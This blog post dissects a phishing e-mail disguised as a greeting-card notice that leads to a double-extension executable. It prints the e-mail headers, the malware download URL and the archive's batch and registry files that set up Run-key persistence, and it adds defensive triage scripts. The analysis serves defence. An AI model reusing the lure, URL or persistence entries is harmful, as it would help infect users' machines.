* endellion.me.uk

postcard.gif.exe -- the third one


From All-Yours.net Greeting Cards Mon May 7 17:46:28 2007
X-Apparently-To: yeahright@yahoo.co.uk via 217.146.189.84; Mon, 07 May 2007 17:49:52 +0000
X-YahooFilteredBulk: 67.55.48.150
X-Originating-IP: [67.55.48.150]
Return-Path: <no-reply@all-yours.net>
Authentication-Results: mta126.mail.ukl.yahoo.com from=all-yours.net; domainkeys=neutral (no sig)
Received: from 67.55.48.150 (EHLO host72.host72-server.com) (67.55.48.150) by mta126.mail.ukl.yahoo.com with SMTP; Mon, 07 May 2007 17:49:52 +0000
X-ClientAddr: 64.126.105.194
Received: from User (64-126-105-194.static.everestkc.net [64.126.105.194]) (authenticated bits=0) by host72.host72-server.com (8.12.11/8.12.11) with ESMTP id l47IEni1027067; Mon, 7 May 2007 14:14:49 -0400
Message-Id: <200705071814.l47IEni1027067@host72.host72-server.com>
From: "All-Yours.net Greeting Cards" <no-reply@all-yours.net>  
Subject: You have recived a greeting card from a friend!
Date: Mon, 7 May 2007 12:46:28 -0500
MIME-Version: 1.0
Content-Type: text/html; charset="Windows-1251"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
X-yoursite-MailScanner-Information: Please contact the ISP for more information
X-yoursite-MailScanner: Found to be clean
X-MailScanner-From: no-reply@all-yours.net
Content-Length: 880


Hello , .

A Greeting Card is waiting for you at our virtual post office! You can pick up your postcard at the following web address:

.http://www.all-yours.net/u/view.php?id=a0190313376667

.If you can't click on the web address above, you can also visit E-Greetings at http://www.all-yours.net/ and enter your pickup code, which is: a0190313376667

.(Your postcard will be available for 60 days.)

.Oh -- and if you'd like to reply with a postcard, you can do so by visiting this web address:http://www.all-yours.net/ (Or you can simply click the "reply to this postcard" button beneath your postcard!)

.We hope you enjoy your postcard, and if you do, please take a moment to send a few yourself!

.Regards,
1001 E-Greetings and Postcards
http:///www.all-yours.net/


Well, there you have it: the email, headers and all. Of course all-yours.net is not where the links actually go. Instead they point to http://200.107.49.137/postcard.gif.exe, where a little archive awaits us, weighing in at 227 KB. (The double extension is the usual trick: with Explorer hiding known extensions, which it does by default, the file shows up as postcard.gif.)
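Two things in the mail above are worth pulling out mechanically: the Received chain, which leads from Yahoo's MTA back through host72.host72-server.com to the authenticated client at 64.126.105.194, and the gap between the URL the reader sees and the URL the reader clicks. The script below is an added example, not code from the original post. The header lines are copied from the page; the HTML body is constructed, since the page shows only the rendered text, with the href taken from the note above that the links really go to 200.107.49.137/postcard.gif.exe.

```python
"""Triage of the postcard e-mail: walk the Received chain back to the
submitting client and compare the link the reader sees with the link the
reader actually clicks.  Added example, not code from the original post."""
import re
from email import message_from_string
from email.message import Message
from email.utils import parseaddr
from urllib.parse import urlparse

# Headers copied from the page.  The body is CONSTRUCTED: the page shows only
# the rendered text, and the href comes from the author's note that the links
# really point at 200.107.49.137/postcard.gif.exe.
RAW_MAIL = """\
Return-Path: <no-reply@all-yours.net>
Received: from 67.55.48.150 (EHLO host72.host72-server.com) (67.55.48.150) by mta126.mail.ukl.yahoo.com with SMTP; Mon, 07 May 2007 17:49:52 +0000
Received: from User (64-126-105-194.static.everestkc.net [64.126.105.194]) (authenticated bits=0) by host72.host72-server.com (8.12.11/8.12.11) with ESMTP id l47IEni1027067; Mon, 7 May 2007 14:14:49 -0400
From: "All-Yours.net Greeting Cards" <no-reply@all-yours.net>
Subject: You have recived a greeting card from a friend!
Content-Type: text/html; charset="Windows-1251"

<p>A Greeting Card is waiting for you at our virtual post office!</p>
<a href="http://200.107.49.137/postcard.gif.exe">http://www.all-yours.net/u/view.php?id=a0190313376667</a>
"""

IPV4 = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")
ANCHOR = re.compile(r'<a\s[^>]*href="([^"]+)"[^>]*>(.*?)</a>', re.I | re.S)


def parse_received(hdr: str) -> dict:
    """Split one Received header into the claimed sender, the literal IP the
    receiving MTA recorded, and the MTA that stamped the header."""
    from_part, _, by_part = hdr.partition(" by ")
    ip = IPV4.search(from_part)
    return {
        "from": from_part.split()[1],          # token after the word "from"
        "ip": ip.group(0) if ip else None,
        "by": by_part.split()[0],
        "authenticated": "authenticated" in from_part,
    }


def received_chain(msg: Message) -> list:
    """Received headers are prepended by each MTA, so the last one is the
    oldest hop, i.e. the client that handed the mail in."""
    return [parse_received(h) for h in msg.get_all("Received", [])]


def link_findings(html: str) -> list:
    """Flag anchors whose visible URL disagrees with the href, bare-IP hosts
    and double-extension executables such as postcard.gif.exe."""
    findings = []
    for href, text in ANCHOR.findall(html):
        target = urlparse(href)
        host = target.hostname or ""
        shown = text.strip()
        shown_host = urlparse(shown).hostname if shown.startswith("http") else None
        if shown_host and shown_host != host:
            findings.append(f"display/href mismatch: {shown_host} -> {host}")
        if IPV4.fullmatch(host):
            findings.append(f"bare IP host: {host}")
        filename = target.path.rsplit("/", 1)[-1].lower()
        if filename.endswith(".exe") and filename.count(".") > 1:
            findings.append(f"double extension: {filename}")
    return findings


def triage(raw: str) -> dict:
    """Summarise where the mail was submitted and what its links do."""
    msg = message_from_string(raw)
    origin = received_chain(msg)[-1]            # oldest hop: the submitting client
    return {
        "from_domain": parseaddr(msg["From"])[1].split("@")[1],
        "submitted_from": origin["ip"],
        "relay": origin["by"],
        "authenticated": origin["authenticated"],
        "findings": link_findings(msg.get_payload()),
    }


if __name__ == "__main__":
    for key, value in triage(RAW_MAIL).items():
        print(f"{key}: {value}")
```

The From: domain says all-yours.net, but the oldest hop shows an authenticated submission from 64.126.105.194 into host72.host72-server.com, and the anchor text and href disagree on both host and file. None of this needs the sample to be fetched; the same functions run over any raw message saved from a mailbox.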

Contents of the RAR archive:

sup.bat contains:

@regedit /s sup.reg
@exit

sup.reg contains:

REGEDIT4
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"taskmgr"="C:\\WINNT\\system32\\explorer.exe"
"IExplorer"="C:\\WINDOWS\\system32\\explorer.exe"
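The .reg file is the persistence step: two Run-key values that look like Task Manager and Internet Explorer but both start an explorer.exe dropped into system32, where the real Explorer never lives (it sits directly under the Windows directory). The script below, an added example rather than anything from the original post or the malware, parses a REGEDIT4 export and flags exactly that pattern. The .reg text is copied from the page; the table of canonical locations is an assumption about stock Windows layouts (WINNT on 2000, WINDOWS on XP), and the value-name check is a heuristic.

```python
"""Spot suspicious autorun entries in a REGEDIT4 export: system binary names
sitting outside their normal directory, and value names that advertise one
program while launching another.  Added example, not from the original post."""
import re

# Copied from the page (sup.reg).
SUP_REG = r"""REGEDIT4
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"taskmgr"="C:\\WINNT\\system32\\explorer.exe"
"IExplorer"="C:\\WINDOWS\\system32\\explorer.exe"
"""

AUTORUN_KEYS = {
    r"hkey_local_machine\software\microsoft\windows\currentversion\run",
    r"hkey_local_machine\software\microsoft\windows\currentversion\runonce",
    r"hkey_current_user\software\microsoft\windows\currentversion\run",
}

# Assumed stock layout: the Windows directory is WINNT (2000) or WINDOWS (XP),
# explorer.exe lives directly in it, the others in system32.
WINDOWS_DIRS = {"WINNT", "WINDOWS"}
CANONICAL_DIR = {
    "explorer.exe": "",
    "taskmgr.exe": "system32",
    "svchost.exe": "system32",
    "lsass.exe": "system32",
    "winlogon.exe": "system32",
}

VALUE_LINE = re.compile(r'^"([^"]+)"="(.*)"$')


def parse_reg(text: str):
    """Yield (key, value_name, value) for every string value in the export.
    REGEDIT4 doubles backslashes inside string values, so undo that."""
    key = None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
        elif key and (m := VALUE_LINE.match(line)):
            yield key, m.group(1), m.group(2).replace("\\\\", "\\")


def relative_location(path: str):
    """Directory of `path` relative to the Windows directory, lower-cased:
    C:\\WINNT\\system32\\explorer.exe -> 'system32', C:\\WINNT\\explorer.exe -> ''.
    None when the path is not under a Windows directory at all."""
    parts = path.split("\\")
    if len(parts) < 3 or parts[1].upper() not in WINDOWS_DIRS:
        return None
    return "\\".join(parts[2:-1]).lower()


def autorun_findings(text: str) -> list:
    findings = []
    for key, name, value in parse_reg(text):
        if key.lower() not in AUTORUN_KEYS:
            continue
        exe = value.rsplit("\\", 1)[-1].lower()
        expected = CANONICAL_DIR.get(exe)
        if expected is not None and relative_location(value) != expected:
            findings.append(f"{name}: {exe} outside its normal location ({value})")
        claimed = name.lower() + ".exe"           # heuristic: "taskmgr" -> taskmgr.exe
        if claimed in CANONICAL_DIR and claimed != exe:
            findings.append(f"{name}: value name suggests {claimed} but runs {exe}")
    return findings


if __name__ == "__main__":
    for finding in autorun_findings(SUP_REG):
        print(finding)
```

Both values trip the location check, and the "taskmgr" entry also trips the name check. Running the same function over an export of the live Run keys (regedit /e on the key, which is the inverse of the /s import in sup.bat) turns the one-off observation into a repeatable triage step.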

Norton reckons the "explorer.exe" to be an "IRC Trojan", and the technical details it gives are not very technical. My kind of people!